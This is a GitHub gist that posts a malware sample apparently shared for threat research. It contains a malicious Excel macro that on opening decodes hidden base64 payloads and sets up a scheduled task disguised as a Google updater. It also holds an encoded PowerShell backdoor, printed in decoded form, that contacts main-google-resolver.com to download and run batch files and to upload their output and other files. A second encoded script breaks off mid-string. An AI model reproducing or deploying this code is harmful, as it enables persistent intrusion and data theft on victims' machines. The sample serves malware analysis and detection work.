Skip to content

Instantly share code, notes, and snippets.

@johnjohnsp1

johnjohnsp1/gist:d29ff04cc2e0a836a1290b28e504ba7a

Forked from anonymous/gist:d0da355e5c21a122866808d37234cd5d
Created October 23, 2016 05:03
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save johnjohnsp1/d29ff04cc2e0a836a1290b28e504ba7a to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save johnjohnsp1/d29ff04cc2e0a836a1290b28e504ba7a to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @invalid-email-address Anonymous created this gist Oct 23, 2016.
    437 changes: 437 additions & 0 deletions gistfile1.txt
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,437 @@
    //sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
    //posted by @JohnLaTwC
    // Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html

    ----------------------------------------------- macro ----------------------------------

    Private Sub Workbook_Open()
    Call doom_Init
    Call doom_ShowHideSheets
    End Sub

    Sub doom_ShowHideSheets()
    If ActiveWorkbook.Worksheets(1).Visible Then
    Dim WS_Count As Integer
    Dim I As Integer
    WS_Count = ActiveWorkbook.Worksheets.Count
    For I = 1 To WS_Count
    ActiveWorkbook.Worksheets(I).Visible = True
    Next I
    ActiveWorkbook.Worksheets(1).Visible = False
    ActiveWorkbook.Worksheets(2).Activate
    End If
    End Sub

    Sub doom_Init()
    Set BackupVbs = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 24)
    Set DnEPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 25)
    Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
    Set wss = CreateObject("WScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
    pth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\RecordedTV\"
    If Not (fso.FolderExists(pth)) Then
    fso.CreateFolder (pth)
    End If
    cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnSPs1 & "'));$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""';Set-Content '" & pth & "DnS.ps1" & "' $f}"""
    cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
    If Not (fso.FileExists(pth & "backup.vbs")) Then
    If Not (fso.FolderExists(pth & "up")) Then
    fso.CreateFolder (pth & "up")
    End If
    If Not (fso.FolderExists(pth & "dn")) Then
    fso.CreateFolder (pth & "dn")
    End If
    If Not (fso.FolderExists(pth & "tp")) Then
    fso.CreateFolder (pth & "tp")
    End If
    wss.Run cmd, 0
    wss.Run cmd2, 0
    Set wss = Nothing
    Set fso = Nothing
    End If
    End Sub


    ----------------------------------------------- DnE.ps1 ----------------------------------
    powershell -EncodedCommand "JABNAFkASABPAE0ARQAgAD0AIAAkAEUAbgB2ADoAUAB1AGIAbABpAGMAKwAiAFwATABpAGIAcgBhAHIAaQBlAHMAXABSAGUAYwBvAHIAZABlAGQAVABWAFwAIgA7AA0ACgAkAFMARQBSAFYARQBSACAAPQAgACIAaAB0AHQAcAA6AC8ALwBtAGEAaQBuAC0AZwBvAG8AZwBsAGUALQByAGUAcwBvAGwAdgBlAHIALgBjAG8AbQAvAGkAbgBkAGUAeAAuAGEAcwBwAHgAPwBpAGQAPQAxADgANQA4ADgANAA3ADkAOAA3AFwAIgA7AA0ACgAkAFUAUAAgAD0AIAAiAHUAcABcACIAOwANAAoAJABEAE4AIAA9ACAAIgBkAG4AXAAiADsADQAKACQAVABQACAAPQAgACIAdABwAFwAIgA7AA0ACgAkAFUAUABMAEsAIAA9ACAAIgB1AHAAbABvAGMAawAiADsADQAKACQARABOAEwASwAgAD0AIAAiAGQAdwBuAGwAbwBjAGsAIgA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABpAG4AawAsACAAJABwAGEAdABoACkADQAKAHsADQAKAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJACQAdwBjAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJAB0AHIAdQBlADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0ACcALAAnACoALwAqACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEwAYQBuAGcAdQBhAGcAZQAnACwAJwBlAG4ALQBVAFMALABlAG4AOwBxAD0AMAAuADUAJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ARQBuAGMAbwBkAGkAbgBnACcALAAnAGcAegBpAHAALAAgAGQAZQBmAGwAYQB0AGUAJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUAByAGEAZwBtAGEAJwAsACcAbgBvAC0AYwBhAGMAaABlACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBDAGEAYwBoAGUALQBDAG8AbgB0AHIAbwBsACcALAAnAG4AbwAtAGMAYQBjAGgAZQAnACkAOwANAAoACQAkAHIAIAA9ACAARwBlAHQALQBSAGEAbgBkAG8AbQA7AA0ACgAJACQAZgBpAGwAZQAgAD0AIAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAcgA7AA0ACgAJAHQAcgB5AA0ACgAJAHsADQAKAAkACQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAGkAbgBrACwAJABmAGkAbABlACkAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkAewANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBSAGUAZgBlAHIAZQByACcALAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGcAbwBvAGcAbABlAC4AYwBvAG0AJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdACAAPQAgACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADMAOwAgAFcAaQBuADYANAA7ACAAeAA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsADQAKAAkACQB0AHIAeQANAAoACQAJAHsADQAKAAkACQAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkAfQANAAoACQAJAGMAYQB0AGMAaAANAAoACQAJAHsADQAKAAkACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwANAAoACQAJAH0ADQAKAAkAfQANAAoACQAkAGMAZAAgAD0AIAAkAHcAYwAuAFIAZQBzAHAAbwBuAHMAZQBIAGUAYQBkAGUAcgBzAFsAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuACcAXQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAYwBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAZAAuAEkAbgBkAGUAeABPAGYAKAAnAGYAaQBsAGUAbgBhAG0AZQA9ACcAKQArADkAKQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAaQBsAGUAbgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC0AJwAsACcALwAnACkAKQApADsADQAKAAkAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAKAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAZgBpAGwAZQBuAGEAbQBlACkAIAAtAFYAYQBsAHUAZQAgACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABmAGkAbABlACkAKQApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlACAALQBGAG8AcgBjAGUAOwANAAoACQByAGUAdAB1AHIAbgAgACgAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAGYAaQBsAGUAbgBhAG0AZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AVABoAGUAbQBBAGwAbAANAAoAewANAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwApACkADQAKAAkAewANAAoACQAJAE4AZQB3AC0ASQB0AGUAbQAgACQATQBZAEgATwBNAEUAJABEAE4ATABLACAALQB0AHkAcABlACAAZgBpAGwAZQA7AA0ACgAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAHcAaABpAGwAZQAoACQAaQAgAC0AbABlACAAMwApAA0ACgAJAAkAewANAAoACQAJAAkAdAByAHkADQAKAAkACQAJAHsADQAKAAkACQAJAAkARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGQAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgADQAKAAkACQAJAHsADQAKAAkACQAJAAkAYgByAGUAYQBrADsADQAKAAkACQAJAH0ADQAKAAkACQAJACQAaQArACsAOwANAAoACQAJAH0ADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAZgBpAGwAZQApAA0ACgB7AA0ACgAJAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAKAAkAGYAaQBsAGUAKQApAC4AbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQANAAoACQB7AA0ACgAJAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJAAkAJAB3AGMALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ATABhAG4AZwB1AGEAZwBlACcALAAnAGUAbgAtAFUAUwAsAGUAbgA7AHEAPQAwAC4ANQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8AZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBQAHIAYQBnAG0AYQAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABmAGkAbABlACkAKQApACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQAZgBpAGwAZQAgAC0ARQBuAGMAbwBkAGkAbgBnACAARABlAGYAYQB1AGwAdAA7AA0ACgAJAAkAJABpAD0AMQA7AA0ACgAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQB7AA0ACgAJAAkACQB0AHIAeQANAAoACQAJAAkAewANAAoACQAJAAkACQAkAHcAYwAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAFMARQBSAFYARQBSACsAJwB1ACcALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkACQAJAGIAcgBlAGEAawA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQBjAG8AbgB0AGkAbgB1AGUAOwANAAoACQAJAAkAfQANAAoACQAJAH0ADQAKAAkACQANAAoACQAJAGkAZgAgACgAJABpACAALQBlAHEAIAA0ACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwBbACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnAF0AIAA9ACAAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMwA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwANAAoACQAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAdAByAHkADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAdwBjAC4AVQBwAGwAbwBhAGQARgBpAGwAZQAoACQAUwBFAFIAVgBFAFIAKwAnAHUAJwAsACQAZgBpAGwAZQApADsADQAKAAkACQAJAAkACQBiAHIAZQBhAGsAOwANAAoACQAJAAkACQB9AA0ACgAJAAkACQAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQAJAGMAbwBuAHQAaQBuAHUAZQA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAdwBhAGkAdABmAG8AcgAgAHUAcABsAHAAcgBvAGMAIAAvAFQAIAAxADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAFUAcABUAGgAZQBtAEEAbABsAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAATABLACkAKQANAAoACQB7AA0ACgAJAAkATgBlAHcALQBJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAIAAtAHQAeQBwAGUAIABmAGkAbABlADsADQAKAAkACQBHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAewB0AHIAeQB7AFUAcABsAG8AYQBkAEYAaQBsAGUAUgBlAG0AbwB2AGUAIAAoACQAXwAuAEYAdQBsAGwATgBhAG0AZQApAH0AYwBhAHQAYwBoAHsAYwBvAG4AdABpAG4AdQBlAH0AfQA7AA0ACgAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAIAAtAEYAbwByAGMAZQA7AA0ACgAJAH0ADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABvAGEAZABFAHgAZQBjAHUAdABlAA0ACgB7AA0ACgAJAHQAcgB5AA0ACgAJAHsADQAKAAkACQAkAGIAYQB0AGYAaQBsAGUAIAA9ACAARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGIAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAA0ACgAJAHsADQAKAAkACQByAGUAdAB1AHIAbgA7AA0ACgAJAH0ADQAKAAkAJABhAHIAZwBzAD0AIgAvAGMAIAAiACsAJABiAGEAdABmAGkAbABlACsAIgAgAD4AIAAiACsAJABiAGEAdABmAGkAbABlACsAIgAuAHQAeAB0ACIAOwANAAoACQBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0ARgBpAGwAZQBQAGEAdABoACAAYwBtAGQAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABhAHIAZwBzADsADQAKAAkAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAYgBhAHQAZgBpAGwAZQArACcALgB0AHgAdAAnACkAOwANAAoACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoACQAYgBhAHQAZgBpAGwAZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgBpAHQAQwBoAGUAYwBrAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABEAE4AKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABUAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVABQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkASQBuAGkAdABDAGgAZQBjAGsAOwANAAoACQBEAG8AdwBuAFQAaABlAG0AQQBsAGwAOwANAAoACQBEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQA7AA0ACgAJAFUAcABUAGgAZQBtAEEAbABsADsADQAKAH0ADQAKAA0ACgANAAoADQAKAEEAbABpAHYAZQA7AA0ACgA="

    decodes to:

    $MYHOME = $Env:Public+"\Libraries\RecordedTV\";
    $SERVER = "http://main-google-resolver.com/index.aspx?id=1858847987\";
    $UP = "up\";
    $DN = "dn\";
    $TP = "tp\";
    $UPLK = "uplock";
    $DNLK = "dwnlock";



    function DownloadFile($link, $path)
    {
    $wc = new-object System.Net.WebClient;
    $wc.UseDefaultCredentials = $true;
    $wc.Headers.add('Accept','*/*');
    $wc.Headers.add('User-Agent','Microsoft BITS/7.7');
    $wc.Headers.add('Accept-Language','en-US,en;q=0.5');
    $wc.Headers.add('Accept-Encoding','gzip, deflate');
    $wc.Headers.add('Referer','https://www.google.com');
    $wc.Headers.add('Pragma','no-cache');
    $wc.Headers.add('Cache-Control','no-cache');
    $r = Get-Random;
    $file = ($path.TrimEnd('\'))+'\'+$r;
    try
    {
    $wc.DownloadFile($link,$file);
    }
    catch [System.Net.WebException]
    {
    $wc.Headers.add('Referer','https://www.google.com');
    $wc.Headers.add('Accept','*/*');
    $wc.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko';
    try
    {
    $wc.DownloadFile($link,$file);
    }
    catch
    {
    throw [System.Net.WebException] $_.Exception.ToString();
    }
    }
    $cd = $wc.ResponseHeaders['Content-Disposition'];
    $filename = $cd.Substring($cd.IndexOf('filename=')+9);
    $filename = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($filename.Replace('-','/')));
    Set-Content -Path (($path.TrimEnd('\'))+'\'+$filename) -Value ([System.Convert]::FromBase64String((Get-Content -Path $file))) -Encoding Byte;
    Remove-Item $file -Force;
    return (($path.TrimEnd('\'))+'\'+$filename);
    }



    function DownThemAll
    {
    if(-not(Test-Path $MYHOME$DNLK))
    {
    New-Item $MYHOME$DNLK -type file;
    $i = 1;
    while($i -le 3)
    {
    try
    {
    DownloadFile ($SERVER+'d') ($MYHOME+$DN);
    }
    catch
    {
    break;
    }
    $i++;
    }
    Remove-Item $MYHOME$DNLK -Force;
    }
    }



    function UploadFileRemove($file)
    {
    if((Get-Item ($file)).length -gt 0)
    {
    $wc = new-object System.Net.WebClient;
    $wc.UseDefaultCredentials = $true;
    $wc.Headers.add('Accept','*/*');
    $wc.Headers.add('User-Agent','Microsoft BITS/7.7');
    $wc.Headers.add('Accept-Language','en-US,en;q=0.5');
    $wc.Headers.add('Accept-Encoding','gzip, deflate');
    $wc.Headers.add('Referer','https://www.google.com');
    $wc.Headers.add('Pragma','no-cache');
    $wc.Headers.add('Cache-Control','no-cache');
    [System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($file))) | Out-File $file -Encoding Default;
    $i=1;
    while($i -le 3)
    {
    try
    {
    $wc.UploadFile($SERVER+'u',$file);
    break;
    }
    catch [System.Net.WebException]
    {
    $i++;
    continue;
    }
    }

    if ($i -eq 4)
    {
    $wc.Headers.add('Referer','https://www.google.com');
    $wc.Headers.add('Accept','*/*');
    $wc.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko';
    $i = 1;
    while($i -le 3)
    {
    try
    {
    $wc.UploadFile($SERVER+'u',$file);
    break;
    }
    catch [System.Net.WebException]
    {
    $i++;
    continue;
    }
    }
    }
    }
    waitfor uplproc /T 1;
    Remove-Item $file;
    }



    function UpThemAll
    {
    if(-not(Test-Path $MYHOME$UPLK))
    {
    New-Item $MYHOME$UPLK -type file;
    Get-ChildItem $MYHOME$UP | ForEach-Object{try{UploadFileRemove ($_.FullName)}catch{continue}};
    Remove-Item $MYHOME$UPLK -Force;
    }
    }



    function DownloadExecute
    {
    try
    {
    $batfile = DownloadFile ($SERVER+'b') ($MYHOME+$DN);
    }
    catch
    {
    return;
    }
    $args="/c "+$batfile+" > "+$batfile+".txt";
    Start-Process -WindowStyle Hidden -Wait -FilePath cmd -ArgumentList $args;
    UploadFileRemove($batfile+'.txt');
    Remove-Item ($batfile);
    }



    function InitCheck
    {
    if(-not(Test-Path $MYHOME$DN))
    {
    New-Item $MYHOME$DN -type directory;
    }
    if(-not(Test-Path $MYHOME$UP))
    {
    New-Item $MYHOME$UP -type directory;
    }
    if(-not(Test-Path $MYHOME$TP))
    {
    New-Item $MYHOME$TP -type directory;
    }
    }



    function Alive
    {
    InitCheck;
    DownThemAll;
    DownloadExecute;
    UpThemAll;
    }



    Alive;


    ----------------------------------------------- DnE.ps1 ----------------------------------
    powershell -EncodedCommand "JABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AcwB0ACAAPQAgACcALgBtAGEAaQBuAC0AZwBvAG8AZwBsAGUALQByAGUAcwBvAGwAdgBlAHIALgBjAG8AbQAnADsADQAKACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAIAA9ACAAJwAnADsADQAKACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAD0AIAAwADsADQAKACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAAPQAgACcAIwAjACMAJwA7AA0ACgAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAIAA9ACAAIgAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAFIAZQBjAG8AcgBkAGUAZABUAFYAXAAiADsADQAKAGYAdQBuAGMAdABpAG8AbgAgAGMAbwBuAHYAZQByAHQAVABvAC0AQgBhAHMAZQAzADYAIAAoACQAZABlAGMATgB1AG0APQAiACIAKQANAAoAewANAAoAIAAgACAAIAAkAGQAZQBjAE4AdQBtACAAJQA9ACAANAA2ADYANQA2ADsADQAKACAAIAAgACAAJABhAGwAcABoAGEAYgBlAHQAIAA9ACAAIgAwADEAMgAzADQANQA2ADcAOAA5AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUQBSAFMAVABVAFYAVwBYAFkAWgAiADsADQAKACAAIAAgACAAZABvAA0ACgAgACAAIAAgAH